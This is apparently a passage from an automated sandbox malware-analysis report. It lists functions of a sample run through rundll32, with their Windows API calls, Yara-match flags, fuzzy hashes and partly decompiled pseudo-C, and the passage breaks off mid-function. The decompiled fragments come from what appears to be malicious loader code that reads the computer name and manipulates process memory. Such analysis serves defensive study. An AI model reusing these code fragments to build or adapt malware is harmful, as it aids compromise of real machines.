                                            0x049f6696
                                            0x049f6699
                                            0x049f669f
                                            0x049f669f
                                            0x049f66a6

                                            APIs
                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049F6652
                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049F6683
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Interface_ProxyQueryUnknown_
                                            • String ID:
                                            • API String ID: 2522245112-0
                                            • Opcode ID: e2c30c2951b955e75706720a8aa0d44f7ff0f74d631ecfbc3f3d7012916288a0
                                            • Instruction ID: 35f57b82fe10acde0c2ab9c94dc06a67c1a1c3046755667661af5340e735bbd6
                                            • Opcode Fuzzy Hash: e2c30c2951b955e75706720a8aa0d44f7ff0f74d631ecfbc3f3d7012916288a0
                                            • Instruction Fuzzy Hash: 9921F9B5A00619AFCB00DFA4C888D5AB779FFC9B14B148698ED05DB324D671FE41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05821BBA Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000,?), ref: 05821BEA
                                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000), ref: 05821C31
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                            • String ID:
                                            • API String ID: 552344955-0
                                            • Opcode ID: 5cdc1c1f0fda3e8af095769c47b5460cd2338ce6ccc4f82b3f37590d441e13e8
                                            • Instruction ID: a8610edc59da71517f242b7338a610f8c209a276ea54dd82955db019e40edc1d
                                            • Opcode Fuzzy Hash: 5cdc1c1f0fda3e8af095769c47b5460cd2338ce6ccc4f82b3f37590d441e13e8
                                            • Instruction Fuzzy Hash: 06117075A00218ABCB119BA8C888B9EFFBDFF80795F204059EC05D7240DB74DE81CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05817C1E Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,05813344,69B25F44,?,?,00000000), ref: 05817C5B
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,05813344), ref: 05817CBC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$FileFreeHeapSystem
                                            • String ID:
                                            • API String ID: 892271797-0
                                            • Opcode ID: 58a3e343a38cd2288f84469088047d8636a091f9c748dcd9f89996acd89113f5
                                            • Instruction ID: f998c117509eff816be94872a85b7330c6cad883beccdb2f906c2538e70c1877
                                            • Opcode Fuzzy Hash: 58a3e343a38cd2288f84469088047d8636a091f9c748dcd9f89996acd89113f5
                                            • Instruction Fuzzy Hash: 5711F8B6910208FBDF10EBE4D949ADE7BBDEB08215F104196FD02E2150DB34AA84CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F28E4 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 049F290B
                                              • Part of subcall function 049F69D2: SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 049F295B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ArraySafe$CreateDestroyFreeString
                                            • String ID:
                                            • API String ID: 3098518882-0
                                            • Opcode ID: 678d495a1e5a22f394bc6c2b90968d548476367caa03620df863afb51d31782e
                                            • Instruction ID: ab7cd0e93aa2abb50a496023e7918ddda3e776e795de4e21168bb8cf2127d537
                                            • Opcode Fuzzy Hash: 678d495a1e5a22f394bc6c2b90968d548476367caa03620df863afb51d31782e
                                            • Instruction Fuzzy Hash: 0D113071A00209BFDB019FA4DC04EEEBBB9EF44750F008075EA04A7160E675AA558B91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F78E7 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SysAllocString.OLEAUT32(049F744C), ref: 049F7900
                                              • Part of subcall function 049F69D2: SysFreeString.OLEAUT32(?), ref: 049F6AB1
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F7941
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$Free$Alloc
                                            • String ID:
                                            • API String ID: 986138563-0
                                            • Opcode ID: 8b1304def2b748a7c6bebe1e710be1dfcbdb7da12323bc5d2d652d00350ca35c
                                            • Instruction ID: 04dc0b3ae3f7fdca81c3e5d38cb3130a80dab9b0e00fe7fe2e4334ced700d24d
                                            • Opcode Fuzzy Hash: 8b1304def2b748a7c6bebe1e710be1dfcbdb7da12323bc5d2d652d00350ca35c
                                            • Instruction Fuzzy Hash: DE01627550111ABFDF019FA9D804D9F7BB9EF48710B144032FA08E7120E670AD15CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F1567 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E049F1567(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E049F4DF6(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E049F4C73(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                            0x049f156c
                                            0x049f1577
                                            0x049f1579
                                            0x049f157f
                                            0x049f1581
                                            0x049f1586
                                            0x049f158f
                                            0x049f1593
                                            0x049f159c
                                            0x049f15a0
                                            0x049f15af
                                            0x049f15a2
                                            0x049f15a3
                                            0x049f15a8
                                            0x049f15a8
                                            0x049f15a0
                                            0x049f1593
                                            0x049f15b8

                                            APIs
                                            • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,049F641B), ref: 049F157F
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,049F641B), ref: 049F159C
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: ComputerHeapName$AllocateFree
                                            • String ID:
                                            • API String ID: 187446995-0
                                            • Opcode ID: f9b0934fbe02d15cd0894842a97f3463180c69b3449d80418436aa37120cecbd
                                            • Instruction ID: 2f71ef376834b8da1fb806e6d73c2a1cb425b69605b7a615bfe8516cd72a757d
                                            • Opcode Fuzzy Hash: f9b0934fbe02d15cd0894842a97f3463180c69b3449d80418436aa37120cecbd
                                            • Instruction Fuzzy Hash: C5F05466A00105FBEB11D6998D01FAF76EDDBC5750F150175EA05E3141EA70FE0197B0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F75C6 Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F75C6(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E049F4DF6(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x49fa348; // 0x57d5a8
					_t5 = _t11 + 0x49fba48; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x49fa348; // 0x57d5a8
					_t6 = _t14 + 0x49fb8f8; // 0x6d0063
					_t16 = E049F3E6C(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E049F4C73(_t20);
				}
				return _t18;
			}









                                            0x049f75dc
                                            0x049f75e0
                                            0x049f7620
                                            0x049f75e2
                                            0x049f75e6
                                            0x049f75ed
                                            0x049f75f5
                                            0x049f75fb
                                            0x049f7606
                                            0x049f760f
                                            0x049f7615
                                            0x049f7617
                                            0x049f7617
                                            0x049f7625

                                            APIs
                                            • lstrlenW.KERNEL32(76CDF710,00000000,?,049F2AC0,00000000,?,76CDF710,00000000,76CDF730), ref: 049F75CC
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • wsprintfW.USER32 ref: 049F75F5
                                              • Part of subcall function 049F3E6C: memset.NTDLL ref: 049F3E8F
                                              • Part of subcall function 049F3E6C: GetLastError.KERNEL32 ref: 049F3EDB
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                                            • String ID:
                                            • API String ID: 1672627171-0
                                            • Opcode ID: ee2d19f9c93585ca3264561d5c9f6e9b4db90211f3c7b16be048fb86d761ec8e
                                            • Instruction ID: 8f58496660283ba44f7283fc63b9655f7af8105db47b6c61a6d158ab6cdfbf89
                                            • Opcode Fuzzy Hash: ee2d19f9c93585ca3264561d5c9f6e9b4db90211f3c7b16be048fb86d761ec8e
                                            • Instruction Fuzzy Hash: 1AF0BE32204210ABDB10AB58EC08F9B3B9DDFC4724F168472FB04C7221DA78F8518765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05809A58 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 05809A62
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 05809A9E
                                              • Part of subcall function 0581E376: lstrlen.KERNEL32(?,?,?,?,00000000,?,058017D3,?), ref: 0581E3C4
                                              • Part of subcall function 0581E376: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3D6
                                              • Part of subcall function 0581E376: lstrcpy.KERNEL32(00000000,?), ref: 0581E3E5
                                              • Part of subcall function 0581E376: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3F6
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 1872894792-0
                                            • Opcode ID: 967a529fcf478c7f5053e6e0074f5c2fb11a24b5b738190d3b72166c24bc2af1
                                            • Instruction ID: 60f6a95a6d9d0373584b85066bdf1593fbd6361abf78aa89772c712d61b5ea35
                                            • Opcode Fuzzy Hash: 967a529fcf478c7f5053e6e0074f5c2fb11a24b5b738190d3b72166c24bc2af1
                                            • Instruction Fuzzy Hash: 5BF0A076B022259B86706F5C9C898B9FFACFB89124302816BED16D3351DA726CC0C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581F936 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedIncrement.KERNEL32(0582907C), ref: 0581F94B
                                              • Part of subcall function 05815CA1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 05815CCC
                                              • Part of subcall function 05815CA1: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05815CD9
                                              • Part of subcall function 05815CA1: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05815D65
                                              • Part of subcall function 05815CA1: GetModuleHandleA.KERNEL32(00000000), ref: 05815D70
                                              • Part of subcall function 05815CA1: RtlImageNtHeader.NTDLL(00000000), ref: 05815D79
                                              • Part of subcall function 05815CA1: RtlExitUserThread.NTDLL(00000000), ref: 05815D8E
                                            • InterlockedDecrement.KERNEL32(0582907C), ref: 0581F96F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                            • String ID:
                                            • API String ID: 1011034841-0
                                            • Opcode ID: d0fa929da4b42fd824da063f17feb25c4409a7723fbd87b821377e61b63ef5f0
                                            • Instruction ID: 54070fa140aefd09c52038dd86f2c1cd528b4561e59753a7d4e10c07603dd8ef
                                            • Opcode Fuzzy Hash: d0fa929da4b42fd824da063f17feb25c4409a7723fbd87b821377e61b63ef5f0
                                            • Instruction Fuzzy Hash: C0E01231348335B7DB217BF4A908B6A6F5ABB44A50F004614FE87D0150E720CC91DBBA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3D23 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F3D23(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x49fa2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x49fa1c8 = GetTickCount();
				_t5 = E049F515F(_a4);
				if(_t5 == 0) {
					_t5 = E049F39B5(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E049F6729(_t9) != 0) {
							 *0x49fa300 = 1; // executed
						}
						_t7 = E049F2C52(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}









                                            0x049f3d23
                                            0x049f3d2c
                                            0x049f3d32
                                            0x049f3d39
                                            0x049f3d3d
                                            0x00000000
                                            0x049f3d3d
                                            0x049f3d4a
                                            0x049f3d4f
                                            0x049f3d56
                                            0x049f3d5c
                                            0x049f3d63
                                            0x049f3d6c
                                            0x049f3d6e
                                            0x049f3d6e
                                            0x049f3d78
                                            0x00000000
                                            0x049f3d78
                                            0x049f3d63
                                            0x049f3d7d

                                            APIs
                                            • HeapCreate.KERNEL32(00000000,00400000,00000000,049F3DA8,?), ref: 049F3D2C
                                            • GetTickCount.KERNEL32 ref: 049F3D40
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CountCreateHeapTick
                                            • String ID:
                                            • API String ID: 2177101570-0
                                            • Opcode ID: 827609058439c2409fc85b929f25f6fd88726df0bfd70b8d95b0a11112476953
                                            • Instruction ID: 33ce379a4b6343f815d92ffb4dba2b4db1410239e14141acc6606297e9128af8
                                            • Opcode Fuzzy Hash: 827609058439c2409fc85b929f25f6fd88726df0bfd70b8d95b0a11112476953
                                            • Instruction Fuzzy Hash: E2F01AB0388702AAEB302F71AD05B197E98AF84748F208535EF4AD4191EB7DF8409B25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058147AE Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05813D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813DC1
                                              • Part of subcall function 05813D88: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05813DF7
                                              • Part of subcall function 05813D88: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813E03
                                              • Part of subcall function 05813D88: lstrcmpi.KERNEL32(?,00000000), ref: 05813E40
                                              • Part of subcall function 05813D88: StrChrA.SHLWAPI(?,0000002E), ref: 05813E49
                                              • Part of subcall function 05813D88: lstrcmpi.KERNEL32(?,00000000), ref: 05813E5B
                                              • Part of subcall function 05813D88: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05813EAC
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,058250E8,0000002C,0580B707,05D78E36,?,00000000,0580A3F0), ref: 058147ED
                                              • Part of subcall function 05801C78: GetProcAddress.KERNEL32(?), ref: 05801CA1
                                              • Part of subcall function 05801C78: NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,00000000,?), ref: 05801CC3
                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,058250E8,0000002C,0580B707,05D78E36,?,00000000,0580A3F0,?,00000318), ref: 05814878
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                            • String ID:
                                            • API String ID: 4138075514-0
                                            • Opcode ID: 86fdebf59ecc991346d3d81985c4817804d8dbcb1ead0d2018c1d6cb5caf133f
                                            • Instruction ID: 9965e05daae7e6ef72641a92c6ca3c31bf45d8b8b3abb846c792e49a8a1010e3
                                            • Opcode Fuzzy Hash: 86fdebf59ecc991346d3d81985c4817804d8dbcb1ead0d2018c1d6cb5caf133f
                                            • Instruction Fuzzy Hash: 5321D471E01228ABCF519FA5DC459DEBFB5FF08720F10812AED14A6150C7349A41CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581CB50 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000001,00000000,76C84D40,?,?,00000000,05813333,?,?,?,?,?,?,?,0580BF69), ref: 0581CB65
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 23de3a193efec0ddd803049dfb8bbf8c2551ece312945db402ac3d9ee6134f4f
                                            • Instruction ID: 599419f03ecef41e85ce1935dfe121487943be6459eaa6b349f4b472375fc53b
                                            • Opcode Fuzzy Hash: 23de3a193efec0ddd803049dfb8bbf8c2551ece312945db402ac3d9ee6134f4f
                                            • Instruction Fuzzy Hash: 5A3190B1A40218EFDF50DF99D985DADBBB9FB44224F50806AEE01EB200C730AD81CF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F215A Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E049F215A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x49fa2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                            0x049f215f
                                            0x049f2164
                                            0x049f2172
                                            0x049f2178
                                            0x049f217c
                                            0x049f21ed
                                            0x049f217e
                                            0x049f2182
                                            0x049f2185
                                            0x049f2188
                                            0x049f218f
                                            0x049f2190
                                            0x049f2191
                                            0x049f2193
                                            0x049f2198
                                            0x049f219f
                                            0x049f21a5
                                            0x049f21a6
                                            0x049f21a6
                                            0x049f21ad
                                            0x049f21ae
                                            0x049f21af
                                            0x049f21b3
                                            0x049f21bf
                                            0x049f21c5
                                            0x049f21c6
                                            0x049f21c6
                                            0x049f21c8
                                            0x049f21ce
                                            0x049f21d0
                                            0x049f21d5
                                            0x049f21d6
                                            0x049f21d6
                                            0x049f21dc
                                            0x049f21e5
                                            0x049f21e7
                                            0x049f21ea
                                            0x049f21f9

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049F2172
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: bb757515908c18f6dd9c4388e1f564a4ed8970f08d60122c1e889c8c99350308
                                            • Instruction ID: 189a4060e1912ac49cf113ce91710855a813237c4bde227eec465ed85a94d28b
                                            • Opcode Fuzzy Hash: bb757515908c18f6dd9c4388e1f564a4ed8970f08d60122c1e889c8c99350308
                                            • Instruction Fuzzy Hash: F9110631385345AFEB068F69DC91BE97BA9DB53318F1440DAE6409F292C277A50BC724
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580300E Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,05801765,00000000,00000000), ref: 05803049
                                              • Part of subcall function 05815D9D: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,05829420), ref: 05815DB4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleInformationModuleProcessQuery
                                            • String ID:
                                            • API String ID: 2776635927-0
                                            • Opcode ID: 2a3444e0ba4990315cf91482e998979dce4663a2fa6485cb763dac505ae94ea3
                                            • Instruction ID: 80a636466f140874d099e5b998818a372b822571e8941d2e40ca50e922e5f7a9
                                            • Opcode Fuzzy Hash: 2a3444e0ba4990315cf91482e998979dce4663a2fa6485cb763dac505ae94ea3
                                            • Instruction Fuzzy Hash: E8213B71701609AFEF60CF99DC84EAB77A9FF44290714582AED45CB290DB71ED408B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5347 Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F5347(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x49fa368; // 0x4f79618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E049F24BC( &_v68) == 0) {
						goto L16;
					}
